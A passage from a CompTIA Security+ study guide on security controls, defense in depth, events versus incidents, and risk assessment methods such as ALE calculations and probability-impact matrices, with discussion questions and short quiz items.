letter of the requirement but gives comparable or better protection.

Exam Objective: CompTIA SY0-501 5.7.5


For example, if a security standard specifies a type of process should use separation of duties, but there's no
way to do that in your company, you could use increased logging and managerial oversight. That way it
would be just as impractical for a single dishonest employee to make trouble. If you're required to send
certain messages "over an encrypted network" but for technical reasons you can't encrypt the entire network
or build a separate one, you could use an email or instant messaging program that uses strong encryption on
all its communications. It can even be temporary: if the lock to that secured room breaks, keeping a guard at
the door until you can fix it is a compensating control.
Since they're usually used for regulatory compliance, compensating controls should always have a good
reason that an auditor will accept. "That's hard" or "I don't feel like it" doesn't count even if the substituted
control is just as good as the original. Budgetary or technical constraints might be fine, especially if it's just
until you get a cleaner solution in place.

Discussion: Security controls


Consider security controls you commonly encounter within your own organization.
1. What confidentiality controls are in place?
Answers may vary.
2. What integrity measures are in place?
Answers may vary.
3. What availability measures are in place?
Answers may vary.


Defense in depth
Security controls don't exist in isolation. Instead, they're part of an interleaved whole designed to protect your
organization's assets. Just like a locked door isn't very useful if it's right next to an open window, you need to
make sure that attackers can't bypass or overcome one security control and gain full access. Most obviously
this means you want to keep a complete "shell" around your assets that no one can just slip past, but you also
need to make sure that just finding a single weak point doesn't leave the attacker awash in undefended data.
Instead, security experts recommend a defense in depth strategy where comprehensive security controls exist
on all levels of your organization.

Exam Objective: CompTIA SY0-501 3.1.3.1, 3.1.3.2

Defense in depth strategies typically define multiple layers on which the organization needs to be secured.
Those layers define where you need to look when you set up security systems, and when you troubleshoot
security issues.
 Data
 Application
 Host
 Internal network
 Perimeter network
 Physical facility
 Users and organization


Don't take the diagram too literally when you think about security plans: it's not a video game where an
attacker has to fight through each room in sequence to get the treasure, it's just an effort to make sure that no
one flaw will compromise everything. That's not easy. The data attackers are ultimately after may "live" on
servers you can monitor closely, but it's also flowing through wires, carried on users' personal devices, and
literally flying through the air. Likewise, an attacker who gains too much physical access or employee trust
can exploit them to bypass many other security methods.
Also remember that security risks aren't just about theft of data, but about attacks or other incidents that will
disrupt business functions. On every level, you need to identify critical assets: the ones that can't be easily
replaced, or which will immediately disrupt organizational functions if they're compromised. For the network
especially, this often means the critical nodes the network needs to function, like essential servers or
backbone routers.
Defense in depth doesn't just describe parts of your organization: a single layer can be made more secure
by applying multiple complementary controls. Even if they're all physical security controls, having locked
doors, cameras, and patrolling guards is stronger protection for a secure facility than any one of them alone.
Even with the same type of control, vendor diversity can add security. Having two network firewalls made by
two different vendors means that if an attacker learns a vulnerability in one, it might not work on the other.
Exactly how far you need to take security precautions on any of these levels depends on the precise needs of
your organization. A lot of security controls are good practice even for casual home users, while other
measures are meant for organizations that need to protect highly sensitive data at extreme risk.

Security by design
Closely related to the idea of defense in depth is security by design. The term is mostly used in software
development, but it's equally applicable to any design process. Simply put, security by design means that the
system was designed from the start with security in mind. In other words, you assume that it will be attacked
and plan accordingly. This means making sure it has as few vulnerabilities as possible, and that compromising
any given vulnerability does minimal damage to the system as a whole. By contrast, when a system wasn't
designed securely in the first place, making it secure after the fact requires more complex and intrusive
security measures that might still leave a lot of residual risk.
Securely designed systems tend to have secure policy principles built in, such as separation of duties and least
privilege. They have limited attack surfaces, or places that an attacker could target. They have secure default
settings, so that it's ideally more work to reduce security than to increase it. Finally, they're designed to fail
securely: if a component fails, it does so without compromising security.
Unfortunately, many technologies used in IT aren't secure by design, especially older ones created before
cybersecurity became a major priority.

Security through obscurity


Information security fundamentally is about keeping secrets. It only makes sense that many designers think
"how about I keep people from knowing I have a secret at all?" or "How about I keep the nature of my
security controls secret so no one can guess how to defeat them?" Imagine you have documents with
important secrets. You could hide them so no one knows where to look. You could write them in a foreign
language that most people around you can't read. You could put them in a safe that uses an unusual kind of
lock that most thieves wouldn't have experience at picking.
All of these approaches are examples of what is called security through obscurity, and there are plenty of
examples in modern cybersecurity. Developers of proprietary software often keep the inner workings of their
programs secret, not only to prevent imitators but to make attacks against them more difficult. Administrators
running frequently attacked network services commonly use non-standard ports, just to make it less likely that
someone will notice a service is there and attack it. Other times, they choose a less popular software package
over an industry standard, specifically because attackers are less likely to expect it. Even with Wi-Fi hotspots
it's popular to disable SSID broadcast so casual lookers won't see the network, or to choose a network name
that doesn't hint at what kind of valuable information might be inside.


Security through obscurity is discouraged by most standards organizations. The biggest reason is that
obscurity is often used in place of other security controls. A document hidden in a book can be stolen by
anyone who thinks to look there, unlike a safe that protects it even when attackers know where it is. A
"hidden" Wi-Fi network is still easy for an attacker to find, as is a vulnerable service running on a different
port. A proprietary or uncommon software application, like an unusual lock design, probably doesn't have
fewer vulnerabilities, only fewer well-known ones, and a motivated thief is the most likely person to figure
them out.
In fact, many experts recommend that secure designs use the opposite approach, called open security. In the
open security approach, all the technologies and methodologies you use are known quantities based on openly
published technologies that anyone can inspect and dissect. That way, security experts can examine the
system and look for flaws or ways to improve it further; while attackers can study it as well, they don't have
any inherent advantage over defenders provided the design is sound to begin with. Under open security, the
goal is to design systems so secure that even knowing exactly how they work won't help an attacker get
inside.
In practice, there's nothing inherently wrong with obscurity used as one layer of security. It doesn't hurt
anything to hide your network name, or to use a network service that gives little information to outside scans.
The important thing is that obscurity should never be used as a substitute for other security controls, but only
as an extra safeguard on top of a system that's secure even without it.

Discussion: Security strategies


1. Does your organization practice secure policy principles, such as least privilege, separation of duties, and
defense in depth?
Answers may vary.
2. What are some critical assets within your organization?
Answers may vary.
3. Were the systems surrounding those critical assets designed from the start with security in mind?
Answers may vary.

Events and incidents


In security you'll hear a lot about "events" and "incidents." As with any common words that take on technical
meanings, it's important to distinguish what's meant by each. If you think that both sound terribly broad but
the second sounds a lot more ominous, you're actually off to a pretty good start. In terms of information
security, both have specific meanings, even if different sources draw the line in different places.
An event, generally speaking, is any meaningful change in a system's state that is both detectable and
happened at a specific time. A router crashing is an event. So is an email arriving. So is an application being
installed, a user logging in, or the web server's load suddenly increasing enough that performance noticeably
drops. An event isn't necessarily good or bad, and while it's something you might want to log for later review,
it's not necessarily something you need to ever act on.
An incident is an event or series of events that is unexpected, unusual, and that poses some meaningful threat
to the system's functions, performance, or security. Of the previous examples, a router crashing is definitely
an incident, but for the others it depends on the details. The email might be routine or it could contain a virus,
the application could be normal or might violate network policies, and so on. By stricter definitions, incidents
are limited to human-caused events that threaten the network through malice or negligence; more generally,
they can include the result of disasters or other events that can compromise data security and business
operations. Even if there's not a person behind it, the harm can be the same.
The threats that can turn an event into an incident are pretty varied. Anything that damages the confidentiality,
integrity, or availability of sensitive data is an incident. Likewise, damage to physical assets is an incident. So
are policy violations like misuse of assets or unauthorized changes to the network and its systems. Even just
unexpected system behavior can turn an event into an incident.
If an event is an incident, it needs to be acted on, even if only to confirm that no damage was done and to see
what can prevent a recurrence. An alert is a signal that an event may be an incident, whether it comes from a user's
observation of something wrong or from an automated report by a security system. An alert doesn't mean an
incident has actually occurred, but it does mean you need to act.

Event evaluation
Evaluating whether a security event is an incident or not is one of the great challenges of security, especially
since routine events in a busy network or active organization are so numerous. In fact, the main function of
detective controls is to either recognize security incidents automatically, or to give security personnel the tools
to spot them manually.

Exam Objective: CompTIA SY0-501 2.1.2, 2.1.3


Whenever a security reviewer or automated system analyzes a potential incident and makes a decision, there
are four possible results.

True positive A problem occurred, and the analysis recognized it. This is a good result: even if the
problem itself is bad, it was recognized and can be addressed.
True negative The event was benign, and triggered no alerts. This is a good result, since everything is
quietly working properly.
False positive The event was benign, but the analysis mistook it for a problem. This is bad: frequent false
alarms can disrupt routine functions, cost administrators time, or just make people less alert
when a real attack happens.
False negative A problem occurred, and the analysis mistook it for benign behavior. This is potentially
disastrous, since security could be compromised without anyone knowing.

As you can tell, the positive/negative side is all the analysis process sees, especially if it's an automated
system; the true/false element relies on human review, and sometimes on hindsight. The goal of
managing any sort of detective process is to design a set of evaluation rules that minimize both false positives
and false negatives, with the understanding that it's always better to have a false positive than a false negative.
Over time and after review, evaluation rules can be refined to improve their accuracy.
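
To see the four outcomes side by side, here is a minimal Python sketch, purely illustrative; the function and its inputs are hypothetical. It classifies a single evaluation from two facts: whether a real problem occurred, and whether the analysis raised an alert.

    # Hypothetical illustration of the four evaluation outcomes.
    def classify(problem_occurred, alert_raised):
        if problem_occurred and alert_raised:
            return "true positive"    # real problem, recognized - good
        if not problem_occurred and not alert_raised:
            return "true negative"    # benign event, no alarm - good
        if alert_raised:
            return "false positive"   # false alarm - wastes time and attention
        return "false negative"       # missed problem - potentially disastrous

    print(classify(problem_occurred=False, alert_raised=True))   # false positive
    print(classify(problem_occurred=True, alert_raised=False))   # false negative

The analysis itself only ever sees the second input; deciding whether the first one was true is where human review comes in.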

Discussion: Events and incidents


1. Give an example of an event that isn't an incident.
Answers may vary.
2. Give an example of an event that is a likely incident.
Answers may vary.
3. Why is a false negative worse than a false positive?
False positives only do damage by consuming incident response resources. False negatives allow security
breaches to go undetected.


Assessment: Security concepts


1. Someone put malware on your computer that records all of your keystrokes. What aspect of security was
primarily attacked? Choose the best response.
 Confidentiality
 Integrity
 Availability

2. What type of control would a security assessment procedure be? Choose the best response.
 Management
 Operational
 Physical
 Technical

3. Malware is a common example of a threat vector. True or false?


 True
 False

4. Which controls primarily protect data integrity? Choose all that apply.
 Backups
 Encryption
 Fault tolerance
 Hashing
 Need to know

5. A security program alerts you of a failed logon attempt to a secure system. On investigation, you learn the
system's normal user accidentally had caps lock turned on. What kind of alert was it? Choose the best
response.
 True positive
 True negative
 False positive
 False negative


Module B: Risk management


If security has a beginning, it's the calculation of risk. While it's possible to blindly add security controls and
hope that adherence to general best practices will give you good results, without a detailed understanding of the
greatest risks to your organization's particular assets you have no way of knowing whether you've allocated your
resources effectively or overlooked something critical.
You will learn:
 How to identify assets and threats
 How to calculate risk
 How to manage risk

Risk assessments
When you formulate a security policy, you should begin with a risk assessment process designed to
determine your security needs. How involved it needs to be depends on the size and complexity of your
organization and the level of security it requires, but it should always be conducted in a formal and
methodical manner. The assessment should be performed by security personnel, but it will require input from
others as well: not only technicians and management, but also the physical facilities crew to report on physical
security concerns, legal staff to advise on compliance issues, anyone who regularly handles valuable
assets, and potentially outside security consultants.
There are several steps involved in a complete risk assessment:

1. Identify assets potentially at risk.


2. Conduct a threat assessment for each asset.
3. Analyze business impact for each threat.
4. Determine the likelihood of a given threat doing damage.
5. Prioritize risks by weighing likelihood vs. potential impact of each threat.
6. Create a risk mitigation strategy to shape future security policies.
Remember that risk assessment is just the first part of an overall operational security process. Once you've
created a risk mitigation strategy, you need to formalize security policies, and apply security controls.


Risk registers
The list of risks to any major project can be very long, and as the risk assessment process goes on the amount
of important data you need to compare for each of them increases. Early in the process, it's a good idea to set
up a risk register, a formal document of the risks you've discovered and what data you've correlated or
calculated about them. Depending on the scope of the project and how many people are involved you could
use a spreadsheet, a more complex database, or even dedicated risk management software.

Exam Objective: CompTIA SY0-501 5.3.2.5


For each risk you identify, the risk register should have a variety of fields, with details corresponding to the
process you're using:
 A unique ID and description
 A category, to help group similar risks
 Likelihood
 Business impact
 Priority
 Mitigation steps and strategies
 Residual risk remaining after mitigation
 Contingencies that can be taken if the risk can't be prevented
 The "owner" of the risk, who is responsible for managing it
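
To make the structure concrete, here's a minimal sketch of what a single entry might look like if you tracked your register programmatically; the fields mirror the list above, and every value is a made-up example rather than a recommendation.

    # One hypothetical risk register entry (illustrative values only).
    risk_entry = {
        "id": "R-017",
        "description": "Laptop theft exposes unencrypted customer data",
        "category": "Data loss",
        "likelihood": "Likely",
        "impact": "High",
        "priority": 40,                     # e.g., a likelihood x impact score
        "mitigation": "Full-disk encryption, cable locks, tracking software",
        "residual_risk": "Low",
        "contingency": "Remote wipe and customer notification procedure",
        "owner": "IT security manager",
    }
    print(risk_entry["id"], "-", risk_entry["description"])

In practice a spreadsheet row serves the same purpose; the point is simply that every risk gets the same set of fields.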

Identifying assets
When you begin a risk assessment, you first need to identify all of your organization's assets, as well as their
value. You don't need to worry yet about what threats they might face—that comes later. Instead, focus on
making sure the list is complete. If you miss important assets, you might fail to secure them at all.
Exactly what assets you have depends on the nature of your organization and its business operations, but
some common elements include the following.

Exam Objective: CompTIA SY0-501 5.3.2.4

 Information and data


• Customer information
• Intellectual property and trade secrets
• Operational data like financial and security information
 Computing hardware and software
 Business inventory
 Building or other physical facilities
 Cash or other financial assets
 Personnel
 Branding and business reputation
 Business relationships, including partner assets in your organization's keeping


Threat assessments
Once you know your assets, you're ready to conduct a threat assessment by considering all of the bad things
that could happen to each of your assets. At this point, don't be afraid to include wild improbabilities, as long
as you recognize them for what they are: later on you'll take the likelihood of each threat into account, and
more credible threats will take priority over irrational fears.

Exam Objective: CompTIA SY0-501 5.3.1, 2.3.9.2


When assessing threats, it's helpful to consider them from multiple angles: the harm that can be done to the
asset, the source of the threat, and the threat vector, or method by which it occurs. Deliberate attacks may be
the most varied and rapidly evolving category of threat, but they're not the only one you need to worry about.

Environmental accidents Fire, architectural failure, or anything else going wrong in the physical
environment can damage assets, especially in an industrial facility. Long-term
power outage can also be considered an environmental threat.
Natural disasters Floods, earthquakes, hurricanes, tornadoes, electrical storms, landslides, and any
other sort of natural occurrence in your region.
Equipment failure Computing hardware, network devices, storage media, and industrial equipment
all can fail. Don't just consider the threat to the failed equipment itself: for
example, consider how data is threatened by a drive failure, or how industrial
equipment can be damaged by a faulty control system.
Supply chain failure Every organization needs goods, services, people, information, and other
resources to do business and to cope with damaging incidents. Inability to get
critical resources at the wrong time can hurt operations and incident response
efforts. It's also possible to receive defective or sabotaged goods and information,
or even allow malicious contractors or employees in during a project.
Human error Accidental human behavior doesn't just risk directly damaging assets, it can also
compromise security indirectly. Users can accidentally access or distribute data
they don't realize is sensitive, or introduce vulnerabilities by actions that seem
innocuous. It's even easy for a technician fixing a performance or security issue to
inadvertently create a new one in the process.
Malicious outsiders Outside attacks can take many forms: physical intrusion for purposes of theft or
vandalism, unauthorized network access, distribution of malware, or attempts to
defraud employees. Even attacks that don't directly harm assets can be used to
gain access or trust within the organization, paving the way for a later inside
attack.
Malicious insiders Attackers who already have trust or access within the organization are perhaps the
most dangerous sort of threat, since they're frequently in a position to bypass
safeguards and exploit vulnerabilities in ways an outsider couldn't. Some
malicious insiders act out of greed or personal gain, either to steal assets or
advance themselves in the organization. Others seek revenge on rival employees
or the organization itself, or just act irresponsibly out of boredom. For some
organizations, industrial or state espionage can be a threat. Inside threats don't
have to be employees: contractors, guests, couriers, and anyone else given
legitimate access to your facilities or assets is a potential attacker.


Impact analysis
Once you've listed the threats facing your organization, you need to list the potential costs or other impact if
they occurred. You need to calculate both direct and indirect impact: for example, destruction of the server
holding the company's web storefront doesn't just mean paying for parts and labor to replace it; you'll also
lose sales revenue for the whole time it's out. Likewise, impact can be tangible or intangible: damage to a
company vehicle has a concrete price tag attached, while gaining a corporate reputation for carelessness with
sensitive data can be extremely costly in the long term but difficult to quantify.

Exam Objective: CompTIA SY0-501 5.2.7, 5.3.2.8


Common types of impact you should consider include:

Asset replacement cost The equipment and labor cost required to repair or replace an asset harmed by a
threat. Loss or theft of certain information in particular can be difficult or
impossible to truly repair.
Revenue or opportunity loss   A disabled or compromised resource can prevent your organization from selling
goods or performing services, affecting incoming revenue directly or by loss of
new business opportunities.
Production loss Loss of production assets can leave employees unable to produce goods or achieve
other organizational goals. Production delays can lead to revenue loss, or
increased labor costs catching up after the fact.
Human costs Threats to human health or safety are the most severe from an ethical perspective,
above and beyond how they can affect business operations. Safety threats can
affect employees, customers, or the surrounding community depending on the
nature of your business.
Reputation Threats can easily damage your organization's reputation with potential customers
or business partners, especially if they're high profile or outwardly obvious. In
particular, if it (rightfully or not) appears that you failed to take proper
precautions, outside parties will lose confidence in your organization's capabilities
and responsibility. Even if your organization clearly isn't at fault for what
happened, failure to quickly recover from a problem can lead to a reputation for
being unreliable or unprepared.
Legal consequences Many laws or industry regulations require measures to be taken against likely
threats. Failure to comply with these can lead you or your organization to
consequences ranging from loss of industry certifications, to fines, to civil or
criminal charges. Especially when it comes to regulatory compliance, it isn't only
important that you adhere to required practices: you must be able to demonstrate
after the fact that you exercised due diligence in complying with the regulations
and that failures were outside your control.


Supply chain assessments


If your organization is already involved in manufacturing, distributing, or selling goods, you're probably
already aware of how a shortage or distribution problem for even a single critical component can hurt the
entire business. Even if you're not, every business has similar issues with the equipment, services, personnel,
and resources they use. For instance, the impact of losing a critical server is all the higher if it relies on legacy
hardware that's no longer manufactured. An application that relies on frequent security updates will be an
issue if its publisher goes out of business or stops supporting it. Critical jobs that require a highly specialized
skillset might be difficult to recruit for. In almost any organization a power or internet outage can be
crippling.

Exam Objective: CompTIA SY0-501 5.3.2.7


Attackers can also use your supply chain to attack your company. Hardware or software you receive from
outside parties might be compromised to make stealing data from you easier. Outside organizations and
personnel given access to your facilities and data might use it to become inside attackers, as can newly
recruited employees. Attackers might even disrupt your suppliers and infrastructure providers in ways that
directly hurt your business operations. Data that you share with third parties might be attacked in transit or
while in their hands. If you produce products or services, you even have to worry about downstream supply
chain issues that can affect your finances or company image, like theft or counterfeits. However you secure
your organization, it's hard to be sure that third parties you deal with are equally secure.
An important part of the risk management process is identifying threats that come from your supply chain. As
part of analyzing threats you can perform a supply chain assessment that maps out your supply chains and the
ways they can cause risk to your business operations. Particular areas of interest should be ways that a supply
chain disruption can cause failures in critical business operations and ways that supply chain relationships can
cause data breaches, but depending on your overall security needs you might need to go into a lot of depth.

Privacy impact assessments


One of the chief worries in information security today is how advancing technology threatens
individual privacy. Not only do your customers and employees not want their personal information
carelessly shared, there's also a large and growing body of laws and industry regulations dedicated specifically to
protecting it. This means privacy protections are an essential part of both business relationships and
regulatory compliance.

Exam Objective: CompTIA SY0-501 5.2.8, 5.2.9


Exactly how you have to factor privacy into the risk assessment process depends on what data you keep and
what regulations apply to it. In the United States, federal agencies are required to perform a formal privacy
assessment process every three years, or whenever there's a significant change in the systems or processes
they use to collect, maintain, or disseminate personal information. Similar regulations apply in other countries
or to many private organizations. There are two stages to the process.
First, the agency must conduct a privacy threshold analysis (PTA) to determine whether the system in
question actually handles any personally identifiable information (PII). This might be a simple questionnaire
which the system owner can fill out and submit to the agency's privacy officer, but it's still a formal legal
assertion about informational assets.
If the privacy officer determines that the system handles PII, the agency must perform a privacy impact
assessment (PIA), which is a special type of risk assessment focused on PII. A PIA is much more in depth than
a PTA, and serves three primary goals:

1. To ensure compliance with all external regulations and internal policies regarding privacy
2. To analyze potential privacy risks and their potential impacts
3. To evaluate security controls that can be used to minimize risks


To serve these goals the PIA should follow the overall process of any other risk assessment: determining the
informational assets that must be protected, calculating their potential risks, and designing mitigation
strategies that comply with regulatory and policy needs. You can integrate this process into the rest of your
risk assessment, provided that you still perform the specific steps required for compliance.

Threat probability
In the assessment process so far, you've spent your time compiling pessimistic lists of all the bad things that
can possibly happen and all the destruction they can cause. That's the sort of knowledge that can help to keep
you safe, but to turn it into a realistic analysis you also need to know how likely each of those events is. If
you're conducting a large scale and formal assessment you might contract an actuarial service to help you
determine the odds of a given threat coming to pass, but otherwise you'll need to perform your own research
and make estimations.

Exam Objective: CompTIA SY0-501 1.6.10, 5.2.2, 5.2.3, 5.3.2.6

 Existing incident logs are a valuable if imperfect resource for predicting future threats.
 The probability of threats such as disasters, accidents, and burglary depends on your physical location
and field of business, so you can research relevant factors.
 Equipment manufacturers typically state expected failure rates for their products. You can also research
user or third-party reviews for additional reliability perspectives. You'll encounter some common terms
in reliability reports, but note that they're often used imprecisely or inaccurately.

• Mean time to failure (MTTF) represents the average time it takes for a newly installed device to fail.
It's most accurately used for components or devices that are typically replaced rather than repaired,
such as a light bulb or hard drive.
• Mean time to repair (MTTR) is the average time it takes to repair a serviceable device. For example,
you could use MTTR to describe the time it takes to bring a server back to full operation after a hard
drive or other component fails.
• Mean time between failures (MTBF) is sometimes used interchangeably with MTTF, but it's more
properly used to describe the average uptime between failures on a serviceable device, not counting
time it's offline for repair. To continue the example, you would use MTBF to describe how long you
should expect the newly repaired server to remain online before experiencing some other sort of
failure. If a piece of equipment has a high MTTR and a low MTBF, it's likely to spend a lot of its
lifetime undergoing repairs.
• Mean time between service incidents (MTBSI) is the average time from one failure to the next
failure, including the time needed for repairs. MTBSI is equal to MTBF + MTTR; a short worked
example follows this list.

 Security organizations and vendors frequently publish statistics and trends regarding malware, network
attacks, and other technological threats. You can use these to help estimate the most likely threats to
your organization.
 Business processes themselves can have vulnerabilities which allow an accident or attack to do damage
through outwardly normal activity. Finding these can require someone expert in both the field of
business and the technical systems you use for the process.
 When all else fails, you can contact an expert on the type of threat, and ask for an educated guess.
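
As a rough worked example of the reliability terms above, suppose a serviceable server has an MTBF of 2,000 hours and an MTTR of 8 hours; both figures are invented for illustration.

    # Hypothetical reliability figures for a serviceable server.
    mtbf_hours = 2000.0   # average uptime between failures
    mttr_hours = 8.0      # average repair time after a failure

    mtbsi_hours = mtbf_hours + mttr_hours          # MTBSI = MTBF + MTTR
    availability = mtbf_hours / mtbsi_hours        # fraction of time in service
    failures_per_year = (365 * 24) / mtbsi_hours   # expected failures per year
    downtime_hours_per_year = failures_per_year * mttr_hours

    print(f"MTBSI: {mtbsi_hours:.0f} h, availability: {availability:.2%}")
    print(f"About {failures_per_year:.1f} failures and {downtime_hours_per_year:.0f} hours of downtime per year")

A lower MTBF or a higher MTTR drives the expected downtime up, which is exactly the "spends a lot of its lifetime undergoing repairs" situation described above.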


Especially when it comes to attacks, you don't just need to know the raw odds of a threat occurring; you need to
know the chance that it will successfully damage your assets. The best way to do this is to perform a
vulnerability assessment that tests just how resistant your organization is against likely attacks and other threats.
You might even want to perform a penetration test simulating attacks against your assets. Testing
vulnerabilities is a whole process in itself, beyond the scope of this topic, but at a minimum it involves
two phases:
 Examining your organization's assets and operational procedures to see if a given threat will actually
affect it. For example, if you heard of a new attack against database applications, you should determine
if your database software and version is vulnerable.
 Reviewing your existing security controls and evaluating how well they can respond to the threats
you've recognized. In the previous example, even if your database software is vulnerable, the right
application configurations and network safeguards might still be able to protect against it.

Discussion: Beginning a risk assessment


1. Create a short list of assets important to your organization.
Answers may vary, but might include physical assets, important data, personnel, financial resources, or
business relationships and reputation.
2. Do any of those assets include PII?
Answers may vary, but most organizations handle private employee data at least.
3. Choosing one of the assets you've listed, identify the threats which could impact it.
Answers may vary.
4. Of the threats you've listed, identify ways they could impact the chosen asset.
Answers may vary, but impacts may be financial, operational, legal, or affecting business revenue or
reputation.
5. How would you determine just how likely each of the threats you've listed is?
Answers may vary, but can include research, vulnerability assessments, or penetration tests.

Risk measurement
At this point in the process you should know what threats face your organization, how likely each is to
actually occur, and the damage each can do. This isn't just about knowing what's at stake: it's how you can
determine where you need to apply security controls first and most intensely. Security controls aren't free: you
have limited resources to spend on protecting your assets, and even if you didn't, it would still be
a poor exchange to spend $1,000 to prevent $200 in potential damages.
There are two primary methods for measuring and prioritizing risks, and which you should use depends on the
assets you're protecting and the threats you're protecting against.
 Quantitative risk assessment assigns an objective value, typically a monetary figure, to each risk based
on the probability and impact cost of the associated threat. It can give a clear cost-benefit analysis for a
given security control, but it's only accurate when you can determine a clear and concrete cost for each
potential impact.
 Qualitative risk assessment also begins with the probability and impact cost of each threat, but instead
of monetary values it uses human judgment to calculate and assign a priority to the associated risk. By
its nature, qualitative risk assessment is inexact and subject to the biases and areas of expertise of
whoever is doing the analysis, but it can work even for assets and impacts with intangible costs.


In practice, you might want to use a combination of both. Especially when you're comparing
alternative security measures for your tangible assets, it's easy to do a quantitative analysis while relying on
qualitative comparisons for less straightforward elements.

Quantitative risk assessment


The objective monetary values created by quantitative assessments are attractive for many reasons. Not only
do they let you easily determine the value of a security control, they also are easy to communicate to others.
When you're presenting your risk assessment to upper management, a statement like "A $10,000 backup
power system will save an estimated $50,000 in lost revenues over the next three years" is language they don't
need a security background to understand. The challenge is calculating these values accurately.

Exam Objective: CompTIA SY0-501 5.3.2.1, 5.3.2.2, 5.3.2.3, 5.3.2.9


A common approach to quantitative assessment uses the following values:

SLE Single loss expectancy is the cost of any single loss. If a threat would cause the complete destruction
of an asset, such as a stolen laptop, the SLE is simply the asset value. If a threat would merely
damage an asset, such as a flood doing costly damage to a facility but leaving it repairable, the SLE
is the asset value multiplied by an exposure factor representing an estimated damage percentage.
ARO Annual rate of occurrence is how many times you expect a given type of loss to occur in a year. It
doesn't need to be an integer: if your company has ten laptops stolen in the average year, the ARO is
10. If your warehouse by the river floods about every 20 years, the ARO is 0.05.
ALE Annual loss expectancy is the cost per year you can expect from the threat, or the SLE × ARO. In the
previous examples, 10 stolen $2500 laptops a year comes out to an ALE of $25,000, while
$1,000,000 in flood damage every 20 years produces an ALE of $50,000.

Once you've made these calculations, you can apply them against the cost of a given security control. If an
annual $5000 in locks and tracking software can cut your laptop losses in half, that saves you $12,500 a year
in losses, for a net benefit of $7,500, so it's clearly worthwhile. On the other hand, if moving to a new warehouse
facility out of the flood zone increases annual business costs by $60,000 a year, it would be a net loss.
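
To make the arithmetic concrete, here's a minimal sketch that reproduces the two examples above and compares the laptop ALE to the annual cost of the proposed control; the numbers are the ones used in the text, and the ale function is just shorthand for SLE multiplied by ARO.

    # ALE = SLE x ARO, using the laptop and flood examples from the text.
    def ale(sle, aro):
        return sle * aro

    laptop_ale = ale(sle=2500, aro=10)          # ten $2,500 laptops a year = $25,000
    flood_ale = ale(sle=1_000_000, aro=0.05)    # $1M in damage every 20 years = $50,000

    # A $5,000/year control that halves laptop losses saves $12,500, or $7,500 net.
    control_cost = 5000
    net_benefit = laptop_ale * 0.5 - control_cost

    print(f"Laptop ALE: ${laptop_ale:,.0f}")
    print(f"Flood ALE: ${flood_ale:,.0f}")
    print(f"Net annual benefit of the laptop control: ${net_benefit:,.0f}")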
Even in quantitative analysis the numbers are estimates, and you might consider other factors. For example,
once you account for business disruptions caused by a flood, or the fact that a large and unexpected loss can
do more financial harm than a small planned increase in long-term expenses, the new warehouse might still be
worth the price.
Quantitative analysis needs to have objective numbers, but they don't always have to be monetary values. As
long as you have consistent, internally repeatable numbers, you can perform a quantitative analysis using
performance metrics from automated tools, uptime values, or anything else that can be calculated and maps to
business benefits and costs.

Qualitative risk assessment


Qualitative risk assessment doesn't rely on having concrete financial values for the impact of losses, or strict
percentages for likelihood. This has some real advantages: it's quick and easy, and you can apply it to
situations where you don't or can't have solid numerical data. On the other hand, the result is an assessment
fundamentally based on guesses and hunches, and is only as good as the judgment of the creator.

Exam Objective: CompTIA SY0-501 5.3.2.10


To get around this problem, it's important to use a formalized process even in qualitative risk assessment, and
to avoid personal biases or blind spots by drawing on experts familiar with the assets and threats
involved. A common way to do that is to interview multiple experts for input, or to assemble a
focus group of individuals with different areas of concern or expertise.


Even if qualitative assessments heavily use subjective judgments, it's still common to prioritize threats using
numerical values. For a simple system, you might assign a 1-10 value for the probability of a threat, and
another 1-10 value for its potential impact to the organization. By multiplying the two values in a probability
matrix, you get a 1-100 result. For example, an SQL injection attack that's very likely to occur (8), but targets
a database of only moderate impact to the company (5) would have a risk priority of 40.
Probability Description Level
Very unlikely A theoretical possibility that should be accounted for but would be very unusual. 1

Unlikely A potential threat that's uncommon but not unheard of. 3

Likely A fairly common but not extremely frequent threat. 5

Very likely A very common threat that has a high chance of occurring. 8

Almost certain A threat that's almost guaranteed to occur sooner rather than later. 10

Impact Description Level


Very low The threat can cause almost no damage. 1

Low The threat can cause minor but measurable damage. 3

Medium The threat can cause real damage with significant recovery cost. 5

High The threat can cause serious damage to overall business operations. 8

Severe The threat can cause major damage or massive losses to the organization. 10

A high probability or high impact on its own doesn't give a risk a high priority. For example, commercial
spam email is an unavoidable fact of life, but it doesn't really do much harm. By contrast, a massive gas
explosion caused by employee error would be devastating, but for most businesses it's extremely unlikely. On
the other hand, spam messages with malware attachments or phishing links can do real harm, and in an
industrial plant, accidental explosions might be reasonably likely. In those cases, the overall priority goes up
and you'll want to put security resources toward mitigating the risk. The worst threats are those which are
both highly likely, and highly damaging: these are the ones you'll need to work hardest to defend against.
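
A minimal sketch of that scoring approach, using the levels from the tables above and a hypothetical threat list, might look like this:

    # Levels from the probability and impact tables above.
    PROBABILITY = {"very unlikely": 1, "unlikely": 3, "likely": 5,
                   "very likely": 8, "almost certain": 10}
    IMPACT = {"very low": 1, "low": 3, "medium": 5, "high": 8, "severe": 10}

    # Hypothetical threats as (name, probability, impact) judged by a focus group.
    threats = [
        ("SQL injection against reporting database", "very likely", "medium"),
        ("Commercial spam email", "almost certain", "very low"),
        ("Gas explosion from employee error", "very unlikely", "severe"),
    ]

    # Priority = probability level x impact level; list the biggest risks first.
    for name, prob, impact in sorted(
            threats, key=lambda t: PROBABILITY[t[1]] * IMPACT[t[2]], reverse=True):
        print(f"{PROBABILITY[prob] * IMPACT[impact]:3d}  {name}")

The SQL injection example from the text scores 8 x 5 = 40, while the spam and the explosion each score only 10, matching the point that neither probability nor impact alone makes a risk a top priority.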


Risk management
In the end you don't just need to identify risks, you need to decide how to act on them. Depending on a risk's
nature, its priority, and your available resources, you could choose between multiple strategies to manage it.

Exam Objective: CompTIA SY0-501 5.3.2.12

Risk avoidance    Choosing not to engage in activities that could expose your organization to the risk. For
example, if you're worried about USB flash drives being used to steal data or deliver malware,
you could choose to forbid them on company computers, and even enact group policies
preventing users from connecting removable storage devices. Risk avoidance often is the
most effective way to manage risks, but in many situations it's expensive or restrictive of your
normal business operations. In this case, some organizations might find a total inability to use
removable storage to be disruptive or at least inconvenient.

Risk transference    Transferring some or all of the risk to another party which will assume responsibility, usually
for a direct financial cost. The most common means of risk transference is purchasing
insurance for expensive physical assets: while the destruction of your factory's production
equipment might have an impact too high for your company to survive, the insurance
company has the assets to cover the costs of a disaster. Other transference strategies rely on
external services that include security. In these cases, the provider assumes liability as part of
the service agreement.

Risk mitigation    Applying security controls in order to reduce risk. Mitigation is distinct from avoidance
because it aims to limit the risk of an activity without preventing the activity outright: if
